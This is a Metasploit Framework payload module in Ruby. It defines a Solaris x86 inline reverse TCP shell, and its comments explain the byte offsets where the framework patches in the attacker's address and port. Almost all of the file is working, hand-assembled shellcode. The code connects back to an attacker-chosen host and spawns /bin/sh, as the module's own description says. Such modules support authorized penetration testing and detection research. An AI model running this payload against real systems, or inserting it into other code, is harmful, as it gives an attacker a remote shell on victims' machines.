Path: blob/master/modules/payloads/singles/solaris/x86/shell_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Single-stage (inline) Solaris x86 payload descriptor. The behaviour lives
# entirely in the hand-written shellcode string below; this class only
# describes it to the framework: its size, the byte offsets the framework
# patches at generation time, and the handler/session types that accept the
# resulting connect-back.
module MetasploitModule
  # Byte length of the 'Payload' string below, so the framework can size the
  # payload without generating it. Keep in sync with the shellcode: the
  # string as written is 91 bytes.
  CachedSize = 91

  # Framework mixins (defined elsewhere in the project, not in this file).
  include Msf::Payload::Single
  include Msf::Payload::Solaris
  include Msf::Sessions::CommandShellOptions

  # Registers the payload's metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework; merged with the
  #   values below via merge_info before being handed to super.
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Solaris Command Shell, Reverse TCP Inline',
        'Description' => 'Connect back to attacker and spawn a command shell',
        'Author' => 'Ramon de C Valle',
        'License' => MSF_LICENSE,
        'Platform' => 'solaris',
        'Arch' => ARCH_X86,
        # Listener side: accepts the connect-back and wraps it in a Unix
        # command-shell session.
        'Handler' => Msf::Handler::ReverseTcp,
        'Session' => Msf::Sessions::CommandShellUnix,
        'Payload' => {
          # Byte offsets in 'Payload' that the framework overwrites when the
          # payload is generated: LHOST replaces the 4-byte 127.1.1.1
          # placeholder at offset 15 ('ADDR'); LPORT replaces the 2-byte
          # 0x04d2 (1234) placeholder at offset 21 ('n', 16-bit network byte
          # order). For detection work note that the placeholder bytes in
          # this file are therefore never what appears on the wire.
          'Offsets' =>
            {
              'LHOST' => [ 15, 'ADDR' ],
              'LPORT' => [ 21, 'n' ]
            },
          # Hand-assembled x86 shellcode; the trailing comment on each line
          # is the author's disassembly of that byte sequence. Resizing or
          # reordering any piece invalidates CachedSize and the offsets
          # above.
          'Payload' =>
            "\x68\xff\xd8\xff\x3c" + # pushl $0x3cffd8ff #
            "\x6a\x65" +             # pushl $0x65 #
            "\x89\xe6" +             # movl %esp,%esi #
            "\xf7\x56\x04" +         # notl 0x04(%esi) #
            "\xf6\x16" +             # notb (%esi) #
            "\x68\x7f\x01\x01\x01" + # pushl $0x0101017f #
            "\x66\x68\x04\xd2" +     # pushw $0xd204 #
            "\x66\x6a\x02" +         # pushw $0x02 #
            "\x89\xe7" +             # movl %esp,%edi #
            "\x6a\x02" +             # pushl $0x02 #
            "\x31\xc0" +             # xorl %eax,%eax #
            "\x50" +                 # pushl %eax #
            "\x50" +                 # pushl %eax #
            "\x6a\x02" +             # pushl $0x02 #
            "\x6a\x02" +             # pushl $0x02 #
            "\xb0\xe6" +             # movb $0xe6,%al #
            "\xff\xd6" +             # call *%esi #
            "\x6a\x10" +             # pushl $0x10 #
            "\x57" +                 # pushl %edi #
            "\x50" +                 # pushl %eax #
            "\x31\xc0" +             # xorl %eax,%eax #
            "\xb0\xeb" +             # movb $0xeb,%al #
            "\xff\xd6" +             # call *%esi #
            "\x5b" +                 # popl %ebx #
            "\x53" +                 # pushl %ebx #
            "\x6a\x09" +             # pushl $0x09 #
            "\x53" +                 # pushl %ebx #
            "\x6a\x3e" +             # pushl $0x3e #
            "\x58" +                 # popl %eax #
            "\xff\xd6" +             # call *%esi #
            "\xff\x4f\xe0" +         # decl -0x20(%edi) #
            "\x79\xf6" +             # jns <cntsockcode+57> #
            "\x50" +                 # pushl %eax #
            "\x68\x2f\x2f\x73\x68" + # pushl $0x68732f2f #
            "\x68\x2f\x62\x69\x6e" + # pushl $0x6e69622f #
            "\x89\xe3" +             # movl %esp,%ebx #
            "\x50" +                 # pushl %eax #
            "\x53" +                 # pushl %ebx #
            "\x89\xe1" +             # movl %esp,%ecx #
            "\x50" +                 # pushl %eax #
            "\x51" +                 # pushl %ecx #
            "\x53" +                 # pushl %ebx #
            "\xb0\x3b" +             # movb $0x3b,%al #
            "\xff\xd6"               # call *%esi #
        }
      )
    )
  end
end